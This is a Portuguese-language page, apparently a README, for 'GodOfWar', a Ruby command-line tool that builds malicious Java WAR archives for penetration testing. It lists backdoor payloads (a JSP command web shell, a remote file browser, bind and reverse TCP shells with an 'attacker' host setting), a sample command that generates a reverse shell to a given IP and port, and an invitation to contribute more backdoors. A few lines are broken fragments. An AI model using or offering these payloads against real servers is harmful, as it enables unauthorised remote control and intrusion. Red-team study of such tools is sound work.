
GodOfWar - Construtor malicioso de WAR Java com payloads embutidos
Uma ferramenta de linha de comando para gerar payloads WAR para testes de penetração / red team, escrita em Ruby.
.
hhh
hhhhhhh
hhhhhhhh
hhhhhhhh+
hhhhhhhh'
hhhhhhhh.
hhhhhhhhh
..-- hhhhhhhhh
-sh/.. +. hhhhhhhhh:
/+/:-/+ss-` hhhhhhhhhh:
/MMM`ss:``.` hhhhhhhhhh:
.MMMMM: hhhhhhhhhhhhhhhhh:
MMMMMMM: hhhhhhhhhhhhhhhh:
MMMMMMMMMMMMM: hhhhhhhhhhhhhhhh`
:NNm:odh/oMMMNs. hhhhhhhhhhhhhhhh`
./:`smdo+oos++- `++sNMMMMMNmh+
.-y-` ` :. / -dmddhhhhh-
o/- `//o/ /M/ `+hhhhhhhh`
/o :yosmy +y .`.hhhhhhhho
+` /../.: `.y::hhhhhs:`
` `+yys` .sy` /oohhy:
`/:s/-`` `.hh`
..` ` y+
.hNNmmNdymmmmds` :-
hs. ``.. :y- `
-hhmNmddm+ .
`NMMMMMMm
` `oMMy
`. /Md- :o
MMMMMMMMMMMMMMMMMMM:
MMMMMMMMMMMMMMMMMM:
MMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMM.
`MMMMMMMMMMMMM.
:sNMMMNMdo:
``+m:/-
`
GodOfWar - Construtor de WAR Java malicioso.
-l/--list)
--host/--port)$ gem install godofwar
$ godofwar -h
Menu de ajuda:
-p, --payload PAYLOAD Gera um WAR a partir de um dos payloads disponíveis.
(consulte -l/--list)
-H, --host IP_ADDR Endereço IP local ou remoto para o payload escolhido
(usado com -p/--payload)
-P, --port PORT Porta local ou remota para o payload escolhido
(usado com -p/--payload)
-o, --output [FILE] Ficheiro de saída e nome da implantação.
(o padrão é o nome original do payload. consulte '-l/--list')
-l, --list lista todos os payloads disponíveis.
-h, --help Mostra esta mensagem de ajuda.
Listar todos os payloads
$ godofwar -l
├── cmd_get
│ └── Informações:
│ ├── Descrição: Execução de comandos via interface web
│ ├── SO: qualquer
│ ├── Configurações: {"false"=>"No Settings required!"}
│ ├── Uso: http://host/cmd.jsp?cmd=whoami
│ ├── Referências: ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│ └── Caminho local: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│ └── Informações:
│ ├── Descrição: Navegador remoto de ficheiros, carregar, descarregar, descompactar ficheiros e execução nativa de comandos
│ ├── SO: qualquer
│ ├── Configurações: {"false"=>"No Settings required!"}
│ ├── Uso: http://host/filebrowser.jsp
│ ├── Referências: ["http://www.vonloesch.de/filebrowser.html"]
│ └── Caminho local: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│ └── Informações:
│ ├── Descrição: Bind shell TCP
│ ├── SO: qualquer
│ ├── Configurações: {"port"=>4444, "false"=>"No Settings required!"}
│ ├── Uso: http://host/reverse-shell.jsp
│ ├── Referências: ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
│ └── Caminho local: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│ └── Informações:
│ ├── Descrição: Reverse shell TCP com um formulário HTML para definir LHOST e LPORT a partir do navegador.
│ ├── SO: qualquer
│ ├── Configurações: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│ ├── Uso: http://host/reverse_shell_ui.jsp
│ ├── Referências: []
│ └── Caminho local: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│ └── Informações:
│ ├── Descrição: Reverse shell TCP. LHOST e LPORT estão codificados
│ ├── SO: qualquer
│ ├── Configurações: {"host"=>"attacker", "port"=>4444, "false"=>"No Settings required!"}
│ ├── Uso: http://host/reverse_shell.jsp
│ ├── Referências: []
│ └── Caminho local: /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell
Gerar payload com LHOST e LPORT
godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy
Após a implantação, pode visitar a sua shell em (http://host:8080/puppy/puppy.jsp)
Para contribuir adicionando mais backdoors:
payloads.jsp na pasta recém-criada (com o mesmo nome da pasta).payloads_info.json com
A gem está disponível como código aberto sob os termos da Licença MIT.